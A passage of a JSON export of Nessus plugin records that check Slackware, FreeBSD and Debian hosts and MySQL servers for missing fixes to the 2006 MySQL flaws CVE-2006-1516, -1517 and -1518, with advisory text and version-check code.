"sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2006-129-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21345);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_xref(name:\"SSA\", value:\"2006-129-02\");\n\n script_name(english:\"Slackware 10.2 / current : mysql (SSA:2006-129-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New mysql packages are available for Slackware 10.2 and -current to\nfix security issues. The MySQL package shipped with Slackware 10.2 may\npossibly leak sensitive information found in uninitialized memory to\nauthenticated users. The MySQL package previously in Slackware\n-current also suffered from these flaws, but an additional overflow\ncould allow arbitrary code execution. Since the vulnerabilities\nrequire a valid login and/or access to the database server, the risk\nis moderate. Slackware does not provide network access to a MySQL\ndatabase by default.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.507293\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec112a5f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected mysql package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"10.2\", pkgname:\"mysql\", pkgver:\"4.1.19\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"mysql\", pkgver:\"5.0.21\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-04-01T04:12:30", "description": "The version of MySQL installed on the remote host is earlier than\n4.0.27 / 4.1.19 / 5.0.21. As such, it is potentially affected by the\nfollowing vulnerabilities :\n\n - A remote attacker may be able to read portions of memory\n by sending a specially crafted login packet in which the\n username does not have a trailing NULL. (CVE-2006-1516)\n\n - A remote attacker may be able to read portions of memory\n by sending a specially crafted COM_TABLE_DUMP request \n with an incorrect packet length. (CVE-2006-1517)\n\n - A buffer overflow in the 'open_table()' function could \n allow a remote, authenticated attacker to execute \n arbitrary code via specially crafted COM_TABLE_DUMP \n packets. (CVE-2006-1518)", "edition": 29, "published": "2011-11-18T00:00:00", "title": "MySQL < 4.0.27 / 4.1.19 / 5.0.21 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:mysql:mysql"], "id": "MYSQL_5_0_21.NASL", "href": "https://www.tenable.com/plugins/nessus/17697", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17697);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(17780);\n script_xref(name:\"CERT\", value:\"602457\");\n\n script_name(english:\"MySQL < 4.0.27 / 4.1.19 / 5.0.21 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of MySQL Server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MySQL installed on the remote host is earlier than\n4.0.27 / 4.1.19 / 5.0.21. As such, it is potentially affected by the\nfollowing vulnerabilities :\n\n - A remote attacker may be able to read portions of memory\n by sending a specially crafted login packet in which the\n username does not have a trailing NULL. (CVE-2006-1516)\n\n - A remote attacker may be able to read portions of memory\n by sending a specially crafted COM_TABLE_DUMP request \n with an incorrect packet length. (CVE-2006-1517)\n\n - A buffer overflow in the 'open_table()' function could \n allow a remote, authenticated attacker to execute \n arbitrary code via specially crafted COM_TABLE_DUMP \n packets. (CVE-2006-1518)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/archive/1/432734/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL version 4.0.27 / 4.1.19 / 5.0.21 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:mysql\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_require_keys(\"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"mysql_func.inc\");\n\n\n# nb: banner checks of open source software are prone to false-\n# positives so only run the check if reporting is paranoid.\nif (report_paranoia < 2)\n exit(1, \"This plugin only runs if 'Report paranoia' is set to 'Paranoid'.\");\n\nport = get_service(svc:\"mysql\", default:3306, exit_on_fail:TRUE);\n\nif (!mysql_init(port:port, exit_on_fail:TRUE) == 1) \n exit(1, \"Can't establish a connection to the MySQL server listening on port \"+port+\".\");\n\nversion = mysql_get_version();\nmysql_close();\nif (!strlen(version)) exit(1, \"Can't get the version of the MySQL server listening on port \"+port+\".\");\n\nif (\n version =~ \"^4\\.0\\.([01]?[0-9]|2[0-6])($|[^0-9])\" ||\n version =~ \"^4\\.1\\.(0?[0-9]|1[0-8])($|[^0-9])\" ||\n version =~ \"^5\\.0\\.([01]?[0-9]|20)($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : 4.0.27 / 4.1.19 / 5.0.21' +\n '\\n';\n datadir = get_kb_item('mysql/' + port + '/datadir');\n if (!empty_or_null(datadir))\n {\n report += ' Data Dir : ' + datadir + '\\n';\n }\n databases = get_kb_item('mysql/' + port + '/databases');\n if (!empty_or_null(databases))\n { \n report += ' Databases :\\n' + databases;\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse exit(0, \"The MySQL \"+version+\" server listening on port \"+port+\" is not affected.\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:42:53", "description": "Secunia reports :\n\nMySQL have some vulnerabilities, which can be exploited by malicious\nusers to disclose potentially sensitive information and compromise a\nvulnerable system.\n\n1) An error within the code that generates an error response to an\ninvalid COM_TABLE_DUMP packet can be exploited by an authenticated\nclient to disclosure certain memory content of the server process.\n\n2) A boundary error within the handling of specially crafted invalid\nCOM_TABLE_DUMP packets can be exploited by an authenticated client to\ncause a buffer overflow and allows arbitrary code execution.\n\n3) An error within the handling of malformed login packets can be\nexploited to disclosure certain memory content of the server process\nin the error messages.", "edition": 25, "published": "2006-06-05T00:00:00", "title": "FreeBSD : MySQL -- Information Disclosure and Buffer Overflow Vulnerabilities (4913886c-e875-11da-b9f4-00123ffe8333)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2006-06-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:mysql-server", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_4913886CE87511DAB9F400123FFE8333.NASL", "href": "https://www.tenable.com/plugins/nessus/21633", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21633);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_xref(name:\"CERT\", value:\"602457\");\n script_xref(name:\"Secunia\", value:\"19929\");\n\n script_name(english:\"FreeBSD : MySQL -- Information Disclosure and Buffer Overflow Vulnerabilities (4913886c-e875-11da-b9f4-00123ffe8333)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Secunia reports :\n\nMySQL have some vulnerabilities, which can be exploited by malicious\nusers to disclose potentially sensitive information and compromise a\nvulnerable system.\n\n1) An error within the code that generates an error response to an\ninvalid COM_TABLE_DUMP packet can be exploited by an authenticated\nclient to disclosure certain memory content of the server process.\n\n2) A boundary error within the handling of specially crafted invalid\nCOM_TABLE_DUMP packets can be exploited by an authenticated client to\ncause a buffer overflow and allows arbitrary code execution.\n\n3) An error within the handling of malformed login packets can be\nexploited to disclosure certain memory content of the server process\nin the error messages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wisec.it/vulns.php?page=7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wisec.it/vulns.php?page=8\"\n );\n # http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html\"\n );\n # http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html\"\n );\n # http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.vuxml.org/freebsd/a8d8713e-dc83-11da-a22b-000c6ec775d9.html\"\n );\n # https://vuxml.freebsd.org/freebsd/4913886c-e875-11da-b9f4-00123ffe8333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?01ec0ec8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/06/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"mysql-server>4.0<4.0.27\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql-server>4.1<4.1.19\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql-server>5.1<=5.1.9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:44:35", "description": "Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems :\n\n - CVE-2006-0903\n Improper handling of SQL queries containing the NULL\n character allows local users to bypass logging\n mechanisms.\n\n - CVE-2006-1516\n Usernames without a trailing null byte allow remote\n attackers to read portions of memory.\n\n - CVE-2006-1517\n A request with an incorrect packet length allows remote\n attackers to obtain sensitive information.\n\n - CVE-2006-1518\n Specially crafted request packets with invalid length\n values allow the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed :\n\n woody sarge sid \n mysql 3.23.49-8.15 n/a n/a \n mysql-dfsg n/a 4.0.24-10sarge2 n/a \n mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a \n mysql-dfsg-5.0 n/a n/a 5.0.21-3", "edition": 25, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1071-1 : mysql - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2006-10-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mysql", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-1071.NASL", "href": "https://www.tenable.com/plugins/nessus/22613", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1071. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22613);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-0903\", \"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(16850, 17780);\n script_xref(name:\"DSA\", value:\"1071\");\n\n script_name(english:\"Debian DSA-1071-1 : mysql - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems :\n\n - CVE-2006-0903\n Improper handling of SQL queries containing the NULL\n character allows local users to bypass logging\n mechanisms.\n\n - CVE-2006-1516\n Usernames without a trailing null byte allow remote\n attackers to read portions of memory.\n\n - CVE-2006-1517\n A request with an incorrect packet length allows remote\n attackers to obtain sensitive information.\n\n - CVE-2006-1518\n Specially crafted request packets with invalid length\n values allow the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed :\n\n woody sarge sid \n mysql 3.23.49-8.15 n/a n/a \n mysql-dfsg n/a 4.0.24-10sarge2 n/a \n mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a \n mysql-dfsg-5.0 n/a n/a 5.0.21-3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366044\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366049\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1071\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the mysql packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"libmysqlclient10\", reference:\"3.23.49-8.15\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libmysqlclient10-dev\", reference:\"3.23.49-8.15\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"mysql-client\", reference:\"3.23.49-8.15\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"mysql-common\", reference:\"3.23.49-8.15\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"mysql-doc\", reference:\"3.23.49-8.5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"mysql-server\", reference:\"3.23.49-8.15\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:44:35", "description": "Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems :\n\n - CVE-2006-0903\n Improper handling of SQL queries containing the NULL\n character allows local users to bypass logging\n mechanisms.\n\n - CVE-2006-1516\n Usernames without a trailing null byte allow remote\n attackers to read portions of memory.\n\n - CVE-2006-1517\n A request with an incorrect packet length allows remote\n attackers to obtain sensitive information.\n\n - CVE-2006-1518\n Specially crafted request packets with invalid length\n values allow the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed :\n\n woody sarge sid \n mysql 3.23.49-8.15 n/a n/a \n mysql-dfsg n/a 4.0.24-10sarge2 n/a \n mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a \n mysql-dfsg-5.0 n/a n/a 5.0.21-3", "edition": 25, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1073-1 : mysql-dfsg-4.1 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2006-10-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mysql-dfsg-4.1", "cpe:/o:debian:debian_linux:3.1"], "id": "DEBIAN_DSA-1073.NASL", "href": "https://www.tenable.com/plugins/nessus/22615", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1073. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22615);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-0903\", \"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(16850, 17780);\n script_xref(name:\"CERT\", value:\"602457\");\n script_xref(name:\"DSA\", value:\"1073\");\n\n script_name(english:\"Debian DSA-1073-1 : mysql-dfsg-4.1 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems :\n\n - CVE-2006-0903\n Improper handling of SQL queries containing the NULL\n character allows local users to bypass logging\n mechanisms.\n\n - CVE-2006-1516\n Usernames without a trailing null byte allow remote\n attackers to read portions of memory.\n\n - CVE-2006-1517\n A request with an incorrect packet length allows remote\n attackers to obtain sensitive information.\n\n - CVE-2006-1518\n Specially crafted request packets with invalid length\n values allow the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed :\n\n woody sarge sid \n mysql 3.23.49-8.15 n/a n/a \n mysql-dfsg n/a 4.0.24-10sarge2 n/a \n mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a \n mysql-dfsg-5.0 n/a n/a 5.0.21-3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1073\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the mysql packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mysql-dfsg-4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"libmysqlclient14\", reference:\"4.1.11a-4sarge3\")) flag++;\nif 